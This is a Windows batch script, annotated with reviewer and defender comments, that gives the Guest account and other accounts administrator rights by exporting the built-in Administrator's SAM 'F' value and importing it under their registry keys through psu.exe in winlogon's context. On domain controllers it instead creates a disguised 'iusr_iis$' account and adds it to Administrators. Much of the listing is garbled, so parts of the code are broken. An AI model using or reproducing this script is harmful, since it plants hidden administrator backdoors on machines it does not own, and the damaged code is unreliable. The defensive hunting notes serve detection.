@rem NOTE(review): this is a Windows batch (cmd.exe) listing, not a POSIX shell script. The published
@rem text is damaged (e.g. "pulist. exe", "= =", ": Start"); it is annotated as published, not repaired.
@echo Guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem Guest.bat: clones the Guest account so that it carries Administrators-level rights.
@rem Defender context: the script exports SAM data from Users\000001f4 (RID 500, the built-in
@rem Administrator) and imports it under Users\000001f5 (RID 501, Guest) and Users\000003e8.
@rem Hunt for regedit.exe run with -e or -s against HKLM\SAM and for changes to a user's "F" value.
@rem If %USERNAME% is set (terminal logon session), the PID must be passed manually as the first argument.
@rem Author's note (machine-translated, partly unclear): change the password manually first and run
@rem the script twice; the regedit steps take the most time.
@rem Save the caller's PATH and current directory; PATH is restored at END1, zcd is only cleared there.
@set zpath=%path%
@set zcd=%cd%
@rem Add the Windows directory and system32 to the search path for the tools called below.
@set Path=%path%;%windir%;%windir%\system32
: Start
@rem If the "net user Guest" output matches "*domain", the host is treated as a domain controller:
@rem the cloning path is skipped and control goes to the DOMAIN branch, which adds a user instead.
@net User Guest |find/i "*domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@rem A non-empty %USERNAME% is taken to mean a terminal logon session; the PID then has to be
@rem supplied on the command line, so control goes to Term.
@if not "%USERNAME%" = "" "Echo username=[%username%],term_login mode. Input PID. &&goto Term
: Start1
@rem Automatic mode: the process list from pulist is filtered for WINLOGON.exe into file "a",
@rem setx writes a value taken from "a" into file "b", and the first token of "b" becomes zpid.
@rem NOTE(review): the setx arguments are garbled in this listing; the field selection cannot be confirmed.
@pulist. exe |findstr.exe/i "WINLOGON.exe" >a
@setx. exe a-f a-a 0,1 >b
@FOR/F "eol=; tokens=1,2,3* delims=, "%%i in (b) do @set zpid=%%i
@goto AUTO
: Term
@rem Manual mode: %1 is used as the PID (see USAGE: the winlogon PID); without it, usage is shown.
@if "%1" = "" Goto USAGE
@rem When a second argument is present it is handed to "net user" for Guest, and for TsInternetUser
@rem if that account is listed. Defender context: unexpected password changes on built-in accounts.
@if not '%2 ' = = ' Net user Guest%2
@if not '%2 ' = = ' net user |find/i ' TsInternetUser ' >nul &&net user TsInternetUser%2
@set zpid=%1
: AUTO
@rem Builds the .reg files that are imported later in the Psu section.
@echo Make Admg.reg Admt.reg admiis.reg
@rem psu.exe is given a regedit export command (-e) and -I%zpid%; presumably it runs the command in
@rem the context of the process with that PID (winlogon per USAGE) - verify against the tool itself.
@rem Exported keys: Users\000001f4 (RID 500, built-in Administrator) and Users\Names.
@rem Defender context: any regedit export of HKLM\SAM\SAM\Domains\Account\Users is a strong signal.
@psu. Exe-p "%windir%\regedit.exe-e admin.reg hkey_local_machine\sam\sam\domains\account\users\000001f4"-I%zpid% >nul
@psu. Exe-p "%windir%\regedit.exe-e name.$$$ hkey_local_machine\sam\sam\domains\account\users\names"-I%zpid% > Nul
@rem Start two .reg files: admg.reg targets Users\000001f5 (RID 501, Guest) and admt.reg targets
@rem Users\000003e8 (RID 1000; presumably TsInternetUser on the author's system - not shown here).
@echo Windows Registry Editor Version 5.00 >admg.reg
@echo Windows Registry Editor Version 5.00 >admt.reg
@echo [Hkey_local_machine\sam\sam\domains\account\users\000001f5]>>admg.reg
@echo [Hkey_local_machine\sam\sam\domains\account\users\000003e8]>>admt.reg
@rem "type" rewrites the Unicode export as ANSI in file "a" so find.exe can read it (per the echo text);
@rem a stale file "b" is removed before it is rebuilt.
@type admin.reg >a &echo "Unicode-->>> ANSI. Find.exe use it ansi. "&if exist B del b
@rem File "b" becomes the "F" value: a hard-coded first hex line followed by lines taken from "a"
@rem that contain a comma. NOTE(review): the setx arguments are garbled; line selection is unconfirmed.
@echo "F" =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx. exe a-f a-a 4,0 |find "," >>b
@setx. exe a-f a-a 5,0 |find "," >>b
@setx. exe a-f a-a 6,0 |find "," >>b
@rem The same "F" data is appended to both .reg files.
@type b >>admg.reg
@type b >>admt.reg
: IIS
@rem Optional third target: an account named iusr_iis$, looked up in the exported Users\Names data.
@rem zda starts as "no"; later checks on it decide whether admiis.reg is built and imported.
@set Zda=no
@echo Iusr_iis exec
@rem Work on ANSI copies of the Names export (name.reg, name.txt).
@type name.$$$ >name.reg
@copy Name.reg name.txt >nul
@rem Loop over 5, 8, ... 29 searching name.reg for iusr_iis$. NOTE(review): the loop body is garbled
@rem (the trailing "set" has no visible assignment), so how zda is updated cannot be confirmed here.
@FOR/L%%i in (5,3,30) do @ (Setx.exe a-f name.reg-a%%i,0 "|find/i" iusr_iis$ &&set)
@rem If zda still reads "No", skip straight to the import section.
@if "%zda%" = = "No" goto PSU
@rem Otherwise rep.exe, find, findstr and setx are chained over name.txt to produce file ZDC.
@rem NOTE(review): rep.exe is a helper not shown on this page; its arguments are garbled here.
@rep. exe "iusr_iis$" NAME.TXT/R/I >nul
@rep. exe "Editor" NAME.TXT/R/I >nul
@find. exe/v/n "" Name.txt >n1
@findstr/I "%zda%" N1 >name.iis
@setx a-f name.iis-a 0,1-d () >zdc
@rem Remove the intermediate files. Defender context: short-lived files named a, b, n1, name.iis,
@rem name.$$$ and name.txt in the working directory are artifacts of this script.
@del N1
@del Name.iis
@del name.$$$
@del Name.txt
@del A
@del b
@rem Pass the first token of ZDC through file ZDD into the variable zdd.
@For/F "tokens=1,2* delims="%%i in (ZDC) do @ (Echo%%i>zdd)
@For/F "tokens=1,2* delims="%%i in (ZDD) do @ (set zdd=%%i)
@rem admiis.reg is a copy of admg.reg in which "1F5" is replaced by %zdd%, i.e. the same "F" data
@rem aimed at a different Users\<RID> key.
@copy Admg.reg Admiis.reg >nul
@echo Rep.exe "1f5" "%zdd%" admiis.reg/i
@rep. exe "1F5" "%zdd%" admiis.reg/i
@del ZDC
@del ZDD
:P su
@rem Import section. Backups from an earlier run (Admg.bak, Admt.bak) are unprotected and copied
@rem over the freshly built .reg files before the import.
@attrib-S-R Admg.bak >nul
@attrib-S-R Admt.bak >nul
@copy Admg.bak Admg.reg >nul
@copy Admt.bak Admt.reg >nul
@rem Silent regedit imports (-s) through psu.exe with -I%zpid%: this is the step that overwrites the
@rem "F" value under Users\000001f5 and Users\000003e8. Defender context: alert on regedit.exe -s
@rem with a parent other than an interactive admin shell, and on writes below HKLM\SAM\SAM.
@psu. Exe-p "%windir%\regedit.exe-s admg.reg"-I%zpid% >nul
@psu. Exe-p "%windir%\regedit.exe-s admt.reg"-I%zpid% >nul
@rem admiis.reg is imported only when zda is not "No"; iusr_iis$ is then enabled and disabled again.
@if not "%zda%" = = "No" psu.exe-p "%windir%\regedit.exe-s admiis.reg"-I%zpid% >nul
@if not '%zda% ' = ' no ' net user iusr_iis$/active:yes >nul
@if not '%zda% ' = ' no ' net user iusr_iis$/active:no >nul
@rem Keep the .reg files as read-only + system backups. Defender context: Admg.bak and Admt.bak
@rem with the +r +s attributes remain on disk after the run.
@copy Admg.reg Admg.bak >nul
@copy Admt.reg Admt.bak >nul
@attrib Admg.bak +r +s >nul
@attrib Admt.bak +r +s >nul
@rem Guest is enabled and immediately disabled again, so the account ends up marked inactive.
@rem The listing does not state why. Defender context: a back-to-back enable/disable pair on a
@rem built-in account (events 4722 and 4725 on current Windows) is worth correlating.
@net User Guest/active:yes >nul
@net User Guest/active:no >nul
@rem When TsInternetUser is not listed, jump to NEXT; as published this also skips the deletes below.
@net user |find/i "TsInternetUser" | | Goto NEXT
@net User Tsinternetuser/active:yes >nul
@net User Tsinternetuser/active:no >nul
@rem Remove the export and the generated .reg files.
@if exist Admin.reg del admin.reg/f >nul
@if exist Admg.reg del admg.reg/f >nul
@if exist Admt.reg del admt.reg/f >nul
: Next
@goto End
:D Omain
@rem Domain-controller branch: no SAM cloning; a user named iusr_iis$ is added instead.
@rem Defender context: an account whose name imitates an IIS service account, created and placed
@rem in Administrators in one run (events 4720 and 4732 on current Windows), should be reviewed.
@rem Add User iusr_iis$
@rem Without a second argument (the password) the branch prints a message and stops.
@if "%2" = = "echo" not input guest of password ' &&goto end
@rem Create iusr_iis$ with %2 as its password unless "net user" already lists an Iusr_iis name.
@net user |find/i "Iusr_iis" >nul | | NET user iusr_iis$%2/add
@rem Add it to the local Administrators group unless it is already a member.
@net localgroup Administrators |find/i "iusr_iis$" >nul | | net localgroup Administrators iusr_iis$/add
@goto End
: USAGE
@rem Usage help: print the process lines matching WINLOGON or Explorer so the PID can be read,
@rem then the expected arguments (PID first, optional password second).
@pulist. exe |findstr.exe/i "WINLOGON Explorer"
@echo "System.bat zpid <password>"
@echo "Need cur winlogon PID, term_mode,must this term_login_winlogon_pid."
@goto end1
: End
@rem Show the current members of the local Administrators group.
@echo ________all User in administrators:
@net localgroup Administrators
: END1
@rem Print the admiis.reg import command line for reference; nothing is executed by this echo.
@echo psu.exe-p "%windir%\regedit.exe-s admiis.reg"-I.%zpid%
@rem Restore the caller's PATH and clear the script's working variables.
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=